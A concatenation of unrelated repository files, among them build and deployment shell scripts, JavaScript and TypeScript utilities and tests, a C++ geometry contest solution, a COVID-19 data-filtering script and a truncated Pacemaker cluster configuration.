if [ ! -f "lua-$LUA/src/liblua.a" ]; then
tar zxf lua-$LUA.tar.gz
( cd lua-$LUA; make MYCFLAGS=-fPIC linux)
if [ $? -ne 0 ]; then
echo "MOLOCH: $MAKE failed"
exit 1
fi
else
echo "MOLOCH: Not rebuilding lua"
fi
# daq
if [ $DODAQ -eq 1 ]; then
if [ ! -f "daq-$DAQ.tar.gz" ]; then
wget https://www.snort.org/downloads/snort/daq-$DAQ.tar.gz
fi
if [ ! -f "daq-$DAQ/api/.libs/libdaq_static.a" ]; then
tar zxf daq-$DAQ.tar.gz
( cd daq-$DAQ; ./configure --with-libpcap-includes=$TPWD/libpcap-$PCAP/ --with-libpcap-libraries=$TPWD/libpcap-$PCAP; make; sudo make install)
if [ $? -ne 0 ]; then
echo "MOLOCH: $MAKE failed"
exit 1
fi
else
echo "MOLOCH: Not rebuilding daq"
fi
fi
# Now build moloch
echo "MOLOCH: Building capture"
cd ..
echo "./configure --prefix=$TDIR $PCAPBUILD --with-yara=thirdparty/yara/yara-$YARA --with-maxminddb=thirdparty/libmaxminddb-$MAXMIND $WITHGLIB --with-curl=thirdparty/curl-$CURL --with-lua=thirdparty/lua-$LUA"
./configure --prefix=$TDIR $PCAPBUILD --with-yara=thirdparty/yara/yara-$YARA --with-maxminddb=thirdparty/libmaxminddb-$MAXMIND $WITHGLIB --with-curl=thirdparty/curl-$CURL --with-lua=thirdparty/lua-$LUA
if [ $DOCLEAN -eq 1 ]; then
$MAKE clean
fi
$MAKE
if [ $? -ne 0 ]; then
echo "MOLOCH: $MAKE failed"
exit 1
fi
# Build plugins
(cd capture/plugins/lua; $MAKE)
if [ $DOPFRING -eq 1 ] || [ -f "/usr/local/lib/libpfring.so" ]; then
(cd capture/plugins/pfring; $MAKE)
fi
if [ $DODAQ -eq 1 ]; then
(cd capture/plugins/daq; $MAKE)
fi
if [ -f "/opt/snf/lib/libsnf.so" ]; then
(cd capture/plugins/snf; $MAKE)
fi
if [ $DONODE -eq 1 ] && [ ! -f "$TDIR/bin/node" ]; then
echo "MOLOCH: Installing node $NODE"
sudo mkdir -p $TDIR/bin $TDIR/etc
if [ ! -f node-v$NODE-linux-x64.tar.xz ] ; then
wget https://nodejs.org/download/release/v$NODE/node-v$NODE-linux-x64.tar.xz
fi
sudo tar xfC node-v$NODE-linux-x64.tar.xz $TDIR
(cd $TDIR/bin ; sudo ln -s ../node-v$NODE-linux-x64/bin/* .)
fi
if [ $DOINSTALL -eq 1 ]; then
export PATH=$TDIR/bin:$PATH
sudo make install
echo "MOLOCH: Installed, now type sudo make config'"
else
echo "MOLOCH: Now type 'sudo make install' and 'sudo make config'"
fi
exit 0
|
<filename>sql/user_progress_insert.sql
insert into user_progress (id, user_string, display, last_modif) values (nextval('somsequence'), $1, 0, CURRENT_DATE); |
<reponame>ErickSharp/installer<gh_stars>0
export class DataCache<T> {
key: string;
limit: number;
constructor(key: string, limit: number) {
this.key = key;
this.limit = limit;
}
static from<T>(key: string, limit: number): DataCache<T> {
return new DataCache(key, limit);
}
async fetchOrCompute(fetcher: () => Promise<T>): Promise<T> {
const cachedData = JSON.parse(localStorage.getItem(`data_cache_${this.key}`));
const cachedDataTimestamp = Number(localStorage.getItem(`data_cache_${this.key}_timestamp`));
if (cachedData && Date.now() - cachedDataTimestamp < this.limit) {
return cachedData as T;
} else {
const data = await fetcher();
localStorage.setItem(`data_cache_${this.key}`, JSON.stringify(data));
localStorage.setItem(`data_cache_${this.key}_timestamp`, String(Date.now()));
return data;
}
}
}
|
<reponame>chird/meteoJS
import assert from 'assert';
import 'jsdom-global/register';
import Type from '../../../src/meteoJS/synview/Type.js';
import TypeCollection from '../../../src/meteoJS/synview/TypeCollection.js';
it('exclusiveVisibility (standard)', () => {
let c = new TypeCollection({ exclusiveVisibility: true });
[0,1,2].forEach(function (id) {
c.append(new Type({ id: id, visible: false }));
});
assert.equal(c.getVisibleTypes().length, 0, 'No visible types');
assert.equal(c.isVisible(), false, 'collection not visible');
c.getItemById(0).setVisible(true);
assert.equal(c.getVisibleTypes().map(function (t) { return t.getId(); }).join(','), '0', 'Visible ID');
assert.equal(c.isVisible(), true, 'collection not visible');
c.getItemById(1).setVisible(true);
assert.equal(c.getVisibleTypes().map(function (t) { return t.getId(); }).join(','), '1', 'Visible ID');
assert.equal(c.isVisible(), true, 'collection not visible');
c.getItemById(0).setVisible(false);
assert.equal(c.getVisibleTypes().map(function (t) { return t.getId(); }).join(','), '1', 'Visible ID');
assert.equal(c.isVisible(), true, 'collection visible');
c.append(new Type({ id: 4, visible: true }));
assert.equal(c.getVisibleTypes().map(function (t) { return t.getId(); }).join(','), '1', 'Visible ID');
assert.equal(c.isVisible(), true, 'collection visible');
c.getItemById(1).setVisible(false);
assert.equal(c.getVisibleTypes().length, 0, 'No visible types');
assert.equal(c.isVisible(), false, 'collection not visible');
});
it('exclusiveVisibility (option change)', () => {
let c1 = new TypeCollection();
[0,1,2].forEach(function (id) {
c1.append(new Type({ id: id, visible: true }));
});
assert.equal(c1.getVisibleTypes().length, 3, '3 visible types');
assert.equal(c1.isVisible(), true, 'collection visible');
c1.setExclusiveVisibility(true);
assert.equal(c1.getVisibleTypes().length, 1, '1 visible types');
assert.equal(c1.getVisibleTypes()[0].getId(), 0, 'Visible type ID = 0');
assert.equal(c1.isVisible(), true, 'collection visible');
let c2 = new TypeCollection();
[0,1,2].forEach(function (id) {
c2.append(new Type({ id: id, visible: (id < 2) ? false : true }));
});
assert.equal(c2.getVisibleTypes().length, 1, '1 visible types');
assert.equal(c2.getVisibleTypes()[0].getId(), 2, 'Visible type ID = 2');
assert.equal(c2.isVisible(), true, 'collection visible');
c2.setExclusiveVisibility(true);
assert.equal(c2.getVisibleTypes().length, 1, '1 visible types');
assert.equal(c2.getVisibleTypes()[0].getId(), 2, 'Visible type ID = 2');
assert.equal(c2.isVisible(), true, 'collection visible');
c2.getItemById(1).setVisible(true);
assert.equal(c2.getVisibleTypes().length, 1, '1 visible types');
assert.equal(c2.getVisibleTypes()[0].getId(), 1, 'Visible type ID = 1');
assert.equal(c2.isVisible(), true, 'collection visible');
let c3 = new TypeCollection();
[0,1,2].forEach(function (id) {
c3.append(new Type({ id: id, visible: (id < 1) ? false : true }));
});
assert.equal(c3.getVisibleTypes().length, 2, '2 visible types');
assert.equal(c3.isVisible(), true, 'collection visible');
c3.setExclusiveVisibility(true);
assert.equal(c3.getVisibleTypes().length, 1, '1 visible types');
assert.equal(c3.getVisibleTypes()[0].getId(), 1, 'Visible type ID = 1');
assert.equal(c3.isVisible(), true, 'collection visible');
});
it('syncVisibility (standard)', () => {
let c = new TypeCollection({ syncVisibility: true });
[0,1,2].forEach(function (id) {
c.append(new Type({ id: id, visible: false }));
});
assert.equal(c.getVisibleTypes().length, 0, 'No visible types');
assert.equal(c.isVisible(), false, 'collection not visible');
c.append(new Type({ id: 4, visible: true }));
assert.equal(c.getVisibleTypes().length, 4, '4 visible types');
assert.equal(c.isVisible(), true, 'collection visible');
c.append(new Type({ id: 5, visible: false }));
assert.equal(c.getVisibleTypes().length, 5, '5 visible types');
assert.equal(c.isVisible(), true, 'collection visible');
c.getItemById(4).setVisible(false);
assert.equal(c.getVisibleTypes().length, 0, 'No visible types');
assert.equal(c.isVisible(), false, 'collection not visible');
});
it('syncVisibility (option change)', () => {
let c1 = new TypeCollection({});
[0,1,2].forEach(function (id) {
c1.append(new Type({ id: id, visible: false }));
});
assert.equal(c1.getVisibleTypes().length, 0, 'No visible types');
assert.equal(c1.isVisible(), false, 'collection not visible');
c1.setSyncVisibility(true);
assert.equal(c1.getVisibleTypes().length, 0, 'No visible types');
assert.equal(c1.isVisible(), false, 'collection not visible');
c1.getItemById(0).setVisible(true);
assert.equal(c1.getVisibleTypes().length, 3, '3 visible types');
assert.equal(c1.isVisible(), true, 'collection visible');
let c2 = new TypeCollection({});
[0,1,2].forEach(function (id) {
c2.append(new Type({ id: id, visible: true }));
});
assert.equal(c2.getVisibleTypes().length, 3, '3 visible types');
assert.equal(c2.isVisible(), true, 'collection visible');
c2.setSyncVisibility(true);
assert.equal(c2.getVisibleTypes().length, 3, '3 visible types');
assert.equal(c2.isVisible(), true, 'collection visible');
c2.getItemById(0).setVisible(false);
assert.equal(c2.getVisibleTypes().length, 0, 'No visible types');
assert.equal(c2.isVisible(), false, 'collection not visible');
let c3 = new TypeCollection({});
[0,1,2].forEach(function (id) {
c3.append(new Type({ id: id, visible: (id < 2) ? false : true }));
});
assert.equal(c3.getVisibleTypes().length, 1, '1 visible types');
assert.equal(c3.isVisible(), true, 'collection visible');
c3.setSyncVisibility(true);
assert.equal(c3.getVisibleTypes().length, 3, '3 visible types');
assert.equal(c3.isVisible(), true, 'collection visible');
let c4 = new TypeCollection({});
[0,1,2].forEach(function (id) {
c4.append(new Type({ id: id, visible: (id < 1) ? false : true }));
});
assert.equal(c4.getVisibleTypes().length, 2, '2 visible types');
assert.equal(c4.isVisible(), true, 'collection visible');
c4.setSyncVisibility(true);
assert.equal(c4.getVisibleTypes().length, 3, '3 visible types');
assert.equal(c4.isVisible(), true, 'collection visible');
}); |
#!/bin/bash
# Copyright 2017 ARC Centre of Excellence for Climate Systems Science
#
# \author Scott Wales <scott.wales@unimelb.edu.au>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -eu
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
mkdir -p build install
pushd build
CC=mpicc FC=mpif90 cmake ${DIR}/src \
-DMPI_Fortran_LIBRARIES=$OPENMPI_ROOT/lib/Intel/libmpi_f90.so \
-DMPI_Fortran_INCLUDE_PATH=$OPENMPI_ROOT/include/Intel \
-DPnetCDF_PATH=$PNETCDF_ROOT \
-DNetCDF_PATH=$NETCDF_ROOT \
-DNetCDF_Fortran_PATH=$NETCDF_FORTRAN_ROOT \
-DCMAKE_INSTALL_PREFIX=$PREFIX \
-DCMAKE_C_FLAGS="-std=gnu99"
make VERBOSE=yes
make check
make install
|
<gh_stars>0
// By KRT girl xiplus
#include <bits/stdc++.h>
#define endl '\n'
#define Debug(A)
const double PI=acos(-1);
const double eps=10e-6;
using namespace std;
struct Point{
double x,y;
};
bool operator == (Point a,Point b){
return abs(a.x-b.x)<eps&&abs(a.y-b.y)<eps;
}
bool operator != (Point a,Point b){
return abs(a.x-b.x)>=eps||abs(a.y-b.y)>=eps;
}
double get_angle(Point p){
if(p.x<0)return atan(p.y/p.x)/PI*180+180;
if(p.x>=0&&p.y<0)return atan(p.y/p.x)/PI*180+360;
return atan(p.y/p.x)/PI*180;
}
struct PointList{
Point point;
double angle;
int type;
};
bool cmp_point(PointList a,PointList b){
if(abs(a.angle-b.angle)<eps) return a.type>b.type;
return a.angle<b.angle;
}
struct Side{
Point p1,p2;
};
struct Multiple{
double x,y;
};
Point get_vector(Point a,Point b){
return {b.x-a.x,b.y-a.y};
}
Multiple Cramer(double a,double b,double c,double d,double e,double f){
// ax+by=e
// cx+dy=f
// https://zh.wikipedia.org/wiki/%E5%85%8B%E8%90%8A%E5%A7%86%E6%B3%95%E5%89%87#.E4.BE.8B.E5.AD.90
if(a*d==b*c)return {NAN,NAN};
return {(e*d-b*f)/(a*d-b*c),(a*f-e*c)/(a*d-b*c)};
}
Point Intersection(Point a1,Point a2,Point b1,Point b2){
// v1=a2-a1 v2=b2-b1
Point Va=get_vector(a1,a2),Vb=get_vector(b1,b2);
Point A=a1,B=b1;
// Ax+m*Vax=Bx+n*Vbx
// Ay+m*Vay=By*n*Vby
// Vax*m+(-Vbx)*n=Bx-Ax
// Vay*m+(-Vby)*n=By-Ay
Multiple k=Cramer(Va.x,-Vb.x,Va.y,-Vb.y,B.x-A.x,B.y-A.y);
if(std::isnan(k.x))return {NAN,NAN};
Point ans={A.x+k.x*Va.x,A.y+k.x*Va.y};
if(min(a1.x,a2.x)-eps<=ans.x&&ans.x<=max(a1.x,a2.x)+eps&&
min(a1.y,a2.y)-eps<=ans.y&&ans.y<=max(a1.y,a2.y)+eps&&
min(b1.x,b2.x)-eps<=ans.x&&ans.x<=max(b1.x,b2.x)+eps&&
min(b1.y,b2.y)-eps<=ans.y&&ans.y<=max(b1.y,b2.y)+eps
)return ans;
return {NAN,NAN};
}
int get_side(double xl,double yt,double xr,double yb,double R){
if(xr<=-R)return 0;
if(xl>=+R)return 0;
if(yb>=+R)return 0;
if(yt<=-R)return 0;
int ans=1;
if(xr>=0)ans++;
if(xl>0)ans++;
if(yb<=0)ans+=3;
if(yt<0)ans+=3;
return ans;
}
int main(){
// ios::sync_with_stdio(false);
// cin.tie(0);
int T,N;
double R,px,py;
cin>>T;
Debug(FILE *ggb;
ggb=fopen("zj b807-ggb.txt","w");
fprintf(ggb,"var a = ggbApplet; \n");)
Debug(int testcount=0;)
while(T--){
Debug(testcount++;)
Debug(cout<<"#"<<testcount<<endl;)
cin>>R>>px>>py>>N;
Debug(printf("%lf %lf %lf %d \n",R,px,py,N);)
Debug(fprintf(ggb,"a.evalCommand('Polygon[(%lf,%lf), (%lf,%lf), (%lf,%lf), (%lf,%lf)]'); \n",px-R,py+R,px-R,py-R,px+R,py-R,px+R,py+R);)
vector<PointList>pointlist;
pointlist.push_back({-R,+R,0,2});
pointlist.push_back({+R,+R,0,2});
pointlist.push_back({-R,-R,0,2});
pointlist.push_back({+R,-R,0,2});
vector<Side>sidelist;
sidelist.push_back({{-R-1,+R},{+R+1,+R}});
sidelist.push_back({{-R-1,-R},{+R+1,-R}});
sidelist.push_back({{-R,+R+1},{-R,-R-1}});
sidelist.push_back({{+R,+R+1},{+R,-R-1}});
double obstacle_ans=0;
for(int q=0;q<N;q++){
double xl,yt,xr,yb;
cin>>xl>>yt>>xr>>yb;
Debug(printf("%lf %lf %lf %lf \n",xl,yt,xr,yb);)
xl-=px;xr-=px;
yt-=py;yb-=py;
if(xl>xr) swap(xl,xr);
if(yt<yb) swap(yt,yb);
Debug(fprintf(ggb,"a.evalCommand('Polygon[(%lf,%lf), (%lf,%lf), (%lf,%lf), (%lf,%lf)]'); \n",xl,yt,xl,yb,xr,yb,xr,yt);)
int side=get_side(xl,yt,xr,yb,R);
if(side==0)continue;
if(xl==xr&&yt==yb)continue;
obstacle_ans+=(min(xr,R)-max(xl,-R))*(min(yt,R)-max(yb,-R));
if(yt!=yb){
if(side%3==1) sidelist.push_back({{xr,yt},{xr,yb}});
else if(side%3==0) sidelist.push_back({{xl,yt},{xl,yb}});
}
if(xl!=xr){
if(side<=3) sidelist.push_back({{xl,yb},{xr,yb}});
else if(side>=7) sidelist.push_back({{xl,yt},{xr,yt}});
}
Debug(printf("inputside: %lf %lf %lf %lf %d \n",xl,yt,xr,yb,side);)
switch(side){
case 1:
pointlist.push_back({xr,min(yt,R),0,0});
Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xr,min(yt,R));)
pointlist.push_back({max(xl,-R),yb,0,1});
Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",max(xl,-R),yb);)
if(xl!=xr&&yt!=yb)pointlist.push_back({xr,yb,0,2});
break;
case 2:
pointlist.push_back({xr,yb,0,0});
Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xr,yb);)
pointlist.push_back({xl,yb,0,1});
Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xl,yb);)
break;
case 3:
pointlist.push_back({min(xr,R),yb,0,0});
Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",min(xr,R),yb);)
pointlist.push_back({xl,min(yt,R),0,1});
Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xl,min(yt,R));)
if(xl!=xr&&yt!=yb)pointlist.push_back({xl,yb,0,2});
break;
case 4:
pointlist.push_back({xr,yt,0,0});
Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xr,yt);)
pointlist.push_back({xr,yb,0,1});
Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xr,yb);)
break;
case 6:
pointlist.push_back({xl,yb,0,0});
Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xl,yb);)
pointlist.push_back({xl,yt,0,1});
Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xl,yt);)
break;
case 7:
pointlist.push_back({max(xl,-R),yt,0,0});
Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",max(xl,-R),yt);)
pointlist.push_back({xr,max(yb,-R),0,1});
Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xr,max(yb,-R));)
if(xl!=xr&&yt!=yb)pointlist.push_back({xr,yt,0,2});
break;
case 8:
pointlist.push_back({xl,yt,0,0});
Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xl,yt);)
pointlist.push_back({xr,yt,0,1});
Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xr,yt);)
break;
case 9:
pointlist.push_back({xl,max(yb,-R),0,0});
Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xl,max(yb,-R));)
pointlist.push_back({min(xr,R),yt,0,1});
Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",min(xr,R),yt);)
if(xl!=xr&&yt!=yb)pointlist.push_back({xl,yt,0,2});
break;
}
}
Debug(
for(auto i:pointlist){
printf("point: %lf %lf %d \n",i.point.x,i.point.y,i.type);
}
for(auto i:sidelist){
printf("side: %lf %lf %lf %lf \n",i.p1.x,i.p1.y,i.p2.x,i.p2.y);
}
)
vector<PointList>point_ans;
for(auto p:pointlist){
Debug(printf(" point: %lf %lf\n",p.point.x,p.point.y);)
bool vaild=true;
double min_dis=10000;
double k;
if(abs(p.point.x)<eps){
k=(R+10)/abs(p.point.y);
}else if(abs(p.point.y)<eps){
k=(R+10)/abs(p.point.x);
}else {
k=(R+10)/min(abs(p.point.x),abs(p.point.y));
}
Point far_p={p.point.x*k,p.point.y*k};
Debug(printf(" far_p: %lf %lf\n",far_p.x,far_p.y);)
Point far_inter={NAN,NAN};;
for(auto s:sidelist){
Point inter=Intersection({0,0},p.point,s.p1,s.p2);
Debug(printf(" side: %lf %lf %lf %lf \n",s.p1.x,s.p1.y,s.p2.x,s.p2.y);)
Debug(printf(" inter: %lf %lf \n",inter.x,inter.y);)
if(inter!=p.point&&!std::isnan(inter.x)){
vaild=false;
Debug(printf(" unvaild \n");)
break;
}
inter=Intersection({0,0},far_p,s.p1,s.p2);
Debug(printf(" inter2: %lf %lf \n",inter.x,inter.y); )
if(p.type!=2&&!std::isnan(inter.x)&&inter!=s.p1&&inter!=s.p2){
if(hypot(inter.x,inter.y)<min_dis){
min_dis=hypot(inter.x,inter.y);
Debug(printf(" far_int: %lf %lf %lf\n",inter.x,inter.y,min_dis);)
far_inter=inter;
}
}
}
if(vaild){
point_ans.push_back({p.point,get_angle(p.point),p.type});
if(p.type!=2) point_ans.push_back({far_inter,get_angle(far_inter),1-p.type});
Debug(printf(" far_point: %lf %lf\n",far_inter.x,far_inter.y);)
}
}
sort(point_ans.begin(),point_ans.end(),cmp_point);
Debug(fprintf(ggb,"----------------- \nvar a = ggbApplet; \na.evalCommand('Polygon[");)
Debug(for(auto p:point_ans){
printf("point_ans: %lf %lf %lf %d\n",p.point.x,p.point.y,p.angle,p.type);
fprintf(ggb,"(%lf,%lf), ",p.point.x,p.point.y);
})
Debug(fprintf(ggb,"]'); \n");)
int sz=point_ans.size();
double ans=0;
for(int q=0;q<sz-1;q++){
ans+=point_ans[q].point.x*point_ans[q+1].point.y;
ans-=point_ans[q+1].point.x*point_ans[q].point.y;
}
ans+=point_ans[sz-1].point.x*point_ans[0].point.y;
ans-=point_ans[0].point.x*point_ans[sz-1].point.y;
Debug(cout<<fixed<<R*R*4<<endl<<abs(ans)/2<<endl<<obstacle_ans<<endl;)
cout<<fixed<<setprecision(2)<<R*R*4-abs(ans)/2-obstacle_ans<<endl;
}
}
|
<filename>server/utils/insights.js
// needs daily values to answer this assignment
const maxVolume = (volumes) => {
return {
'max_volume': volumes.reduce((prev, current) => (prev[1] > current[1]) ? prev : current, 0)
}
}
const longestDowntrend = (prices) => {
let priceNow, priceNext, trendEnded
let trendStarted = null
let longestTrend = 0
let response = { 'longest_downtrend': {'found': false }}
if(prices.length < 2) return response
for(let i = 0; i < prices.length - 1; i++) {
priceNow = prices[i]
priceNext = prices[i + 1]
// in a downtrend
if(priceNow[1] > priceNext[1]) {
trendEnded = priceNext
if(trendStarted === null) trendStarted = priceNow
}
// downtrend just ended
else if(trendStarted !== null) {
const trendLength = trendEnded[0] - trendStarted[0]
if(trendLength > longestTrend) {
longestTrend = trendLength
response = { 'longest_downtrend':
{ 'found': true ,
'start': trendStarted,
'end': trendEnded,
'length_in_days': (trendEnded[0] - trendStarted[0]) /1000/60/60/24 }
}
}
trendStarted = null
}
}
// edge case, donwtrend continued from start to finish
if(trendStarted !== null && longestTrend === 0) {
response = { 'longest_downtrend':
{ 'found': true ,
'start': trendStarted,
'end': trendEnded,
'length_in_days': (trendEnded[0] - trendStarted[0]) /1000/60/60/24 }
}
}
return response
}
const maxProfit = (prices) => {
let maxProfit = { 'max_profit': { 'should_buy': false, 'profit': 0 } }
let buyPrice = prices[0]
let sellPrice, bestSellPrice, bestBuyPrice
let profit = 0
if(prices.length < 2) return maxProfit
for(let i = 0; i < prices.length - 1; i++) {
sellPrice = prices[i + 1]
// a lower price becomes the new price to buy at
if(sellPrice[1] < buyPrice[1]) {
buyPrice = sellPrice
}
// store the best prices if we found a bigger profit
else if(profit < sellPrice[1] - buyPrice[1]) {
profit = sellPrice[1] - buyPrice[1]
bestBuyPrice = buyPrice
bestSellPrice = sellPrice
}
}
if(profit > 0) {
maxProfit = { 'max_profit': {
'should_buy': true,
'when_to_buy': bestBuyPrice,
'when_to_sell': bestSellPrice,
'profit': profit
}
}
}
return maxProfit
}
module.exports = {
maxVolume,
longestDowntrend,
maxProfit
} |
<filename>vendor/rxjs/add/operator/buffer.js
import { Observable } from '../../Observable';
import { buffer } from '../../operator/buffer';
Observable.prototype.buffer = buffer;
|
#!/bin/sh -e
RPCDAEMONPORT=8548
kill_process() {
# $1 - process name
# $2 - port
if [ ! -z "$1" ]; then
RPCDAEMONPID=$(ps aux | grep $1 | grep $2 | awk '{print $2}')
if [ -z "$RPCDAEMONPID" ]; then
echo "no process $1 running on port $2"
else
echo "killing $1 on port $2 with pid $RPCDAEMONPID"
kill $RPCDAEMONPID
fi
fi
}
kill_process "rpcdaemon" $RPCDAEMONPORT
|
import React from 'react'
import ReactDOM from 'react-dom'
import Carousel from '../src'
const slideStyles = {
alignItems: 'center',
display: 'flex',
justifyContent: 'center',
height: '400px'
}
// const settings = {
// isInfinite: false,
// slidesToShow: 1,
// transitionDuration: 300
// }
const Example = () => (
<Carousel>
<div style={{ ...slideStyles, backgroundColor: '#F44336' }}>Test 1</div>
<div style={{ ...slideStyles, backgroundColor: '#2196F3' }}>Test 2</div>
<div style={{ ...slideStyles, backgroundColor: '#4CAF50' }}>Test 3</div>
<div style={{ ...slideStyles, backgroundColor: '#FFEB3B' }}>Test 4</div>
</Carousel>
)
ReactDOM.render(<Example />, document.getElementById('root'))
|
<reponame>mahendrabishnoi2/survey-application
package com.mahendra.survey.newresponse;
public class AnswerSingleQuestion {
Long questionId;
String questionText;
String questionTypeText;
String answerText;
String selectedOptionIds;
public AnswerSingleQuestion(
Long questionId,
String questionText,
String questionTypeText,
String answerText,
String selectedOptionIds) {
this.questionId = questionId;
this.questionText = questionText;
this.questionTypeText = questionTypeText;
this.answerText = answerText;
this.selectedOptionIds = selectedOptionIds;
}
public Long getQuestionId() {
return questionId;
}
public void setQuestionId(Long questionId) {
this.questionId = questionId;
}
public String getQuestionText() {
return questionText;
}
public void setQuestionText(String questionText) {
this.questionText = questionText;
}
public String getQuestionTypeText() {
return questionTypeText;
}
public void setQuestionTypeText(String questionTypeText) {
this.questionTypeText = questionTypeText;
}
public String getAnswerText() {
return answerText;
}
public void setAnswerText(String answerText) {
this.answerText = answerText;
}
public String getSelectedOptionIds() {
return selectedOptionIds;
}
public void setSelectedOptionIds(String selectedOptionIds) {
this.selectedOptionIds = selectedOptionIds;
}
@Override
public String toString() {
return "AnswerSingleQuestion{"
+ "questionId="
+ questionId
+ ", questionText='"
+ questionText
+ '\''
+ ", questionTypeText='"
+ questionTypeText
+ '\''
+ ", answerText='"
+ answerText
+ '\''
+ ", selectedOptionIds='"
+ selectedOptionIds
+ '\''
+ '}';
}
}
|
#!/bin/bash
set -eu
# cd into root to get the project name from path
cd ..
PROJECT_NAME="$(basename "$PWD")"
read -p "Production server username (used to SSH into VPS): " PROD_SERVER_USER
read -p "Production server IP: " PROD_SERVER_IP
echo
echo "============================="
echo "=== Set up project on VPS ==="
echo "============================="
echo
echo "1. SSH into VPS"
echo "2. Recreate project structure required by the production version of 'docker-compose.yml'"
echo "3. Log out of VPS"
ssh "$PROD_SERVER_USER@$PROD_SERVER_IP" "mkdir -p "/home/$PROD_SERVER_USER/$PROJECT_NAME/node" | exit"
echo
echo "4. Copy the '.env' file from local machine to VPS to "/home/$PROD_SERVER_USER/$PROJECT_NAME/node/""
rsync \
--progress \
--archive \
--rsh=ssh \
./node/.env \
"$PROD_SERVER_USER@$PROD_SERVER_IP:/home/$PROD_SERVER_USER/$PROJECT_NAME/node/"
echo
echo "7. Copy the production version of 'docker-compose.yml' to VPS to "/home/$PROD_SERVER_USER/$PROJECT_NAME/""
rsync \
--progress \
--archive \
--rsh=ssh \
./docker-compose.yml "$PROD_SERVER_USER@$PROD_SERVER_IP:/home/$PROD_SERVER_USER/$PROJECT_NAME/"
echo
echo "The project has been set up on VPS successfully!"
|
# Este script sirve para descargar datos de covid19 de la secretaria de salud
# federal y filtrarlos de acuerdo a un determinado criterio, en este caso
# dejar a los casos confirmados que tienen comorbilidades obesidad y tabaquismo solamente
# Descargar los datos y descomprimirlos
echo "Descargando datos y posteriormente descomprimiendo..."
curl -O http://datosabiertos.salud.gob.mx/gobmx/salud/datos_abiertos/datos_abiertos_covid19.zip
unzip *.zip
# Se quitan las comorbilidades a excepcion de obesidad y tabaquismo
echo "Removiendo casos con comorbilidades, excepto obesidad y tabaquismo..."
csvgrep -c DIABETES,EPOC,ASMA,INMUSUPR,HIPERTENSION,OTRA_COM,CARDIOVASCULAR,RENAL_CRONICA -m "2" *.csv > tabaq_obesidad.csv
# Seleccionamos las variables para el analisis
echo "Extrayendo columnas que se usaran en este analisis..."
csvcut -c SEXO,ENTIDAD_RES,FECHA_DEF,EDAD,OBESIDAD,TABAQUISMO,CLASIFICACION_FINAL tabaq_obesidad.csv > tabaq_obesidad_filtrado.csv
# Se eliminan los casos no especificados de obesidad y tabaquismo, mantenemos solo positivo (1) y negativo (2)
echo "Removiendo casos no especificados de obesidad y tabaquismo, y extrayendo solamente casos positivos de covid19..."
csvgrep -c OBESIDAD,TABAQUISMO -r "[12]" tabaq_obesidad_filtrado.csv | csvgrep -c CLASIFICACION_FINAL -r "[123]" > tabaq-obesidad-covid19.csv
# Se mueve el archivo csv resultante a la carpeta data donde esta montado el volumen de docker
# mkdir data
mv tabaq-obesidad-covid19.csv data
echo "Los datos resultantes han sido movidos a la carpeta data en donde se encuentra montado el volumen de docker."
# Se eliminan los datos de procesamiento y se deja solo el conjunto de datos resultante
rm *.csv
rm *.zip |
<reponame>Frozen-Fairies/Grace-Shopper
import React from 'react'
import {Link, Route} from 'react-router-dom'
import SingleMovieView from './singleMovieView'
const SingleMovie = props => {
const {movie} = props
return (
<div className="column is-one-quarter">
<Link
to={`/movies/${movie.genre.slice(0).toLowerCase()}/${movie.uniqueId}`}
>
<div className="level">
<div className="level-item has-text-centered">
<h1>{movie.title}</h1>
</div>
</div>
<img src={movie.imageUrl} />
<div className="level">
<div className="level-item has-text-centered">
<p>${movie.price / 100}</p>
</div>
</div>
</Link>
</div>
)
}
export default SingleMovie
|
#!/bin/sh
cat <<EOF
<cib crm_feature_set="3.3.0" validate-with="pacemaker-3.3" epoch="474" num_updates="0" admin_epoch="0" cib-last-written="Mon Apr 19 22:04:07 2021" update-origin="hana01" update-client="crm_attribute" update-user="root" have-quorum="1" dc-uuid="1084787210">
<configuration>
<crm_config>
<cluster_property_set id="cib-bootstrap-options">
<nvpair id="cib-bootstrap-options-have-watchdog" name="have-watchdog" value="true"/>
<nvpair id="cib-bootstrap-options-dc-version" name="dc-version" value="2.0.4+20200616.2deceaa3a-3.3.1-2.0.4+20200616.2deceaa3a"/>
<nvpair id="cib-bootstrap-options-cluster-infrastructure" name="cluster-infrastructure" value="corosync"/>
<nvpair id="cib-bootstrap-options-cluster-name" name="cluster-name" value="hana_cluster"/>
<nvpair name="stonith-enabled" value="true" id="cib-bootstrap-options-stonith-enabled"/>
</cluster_property_set>
<cluster_property_set id="SAPHanaSR">
<nvpair id="SAPHanaSR-hana_prd_site_srHook_Site2" name="hana_prd_site_srHook_Site2" value="SOK"/>
</cluster_property_set>
</crm_config>
<nodes>
<node id="1084787210" uname="hana01">
<instance_attributes id="nodes-1084787210">
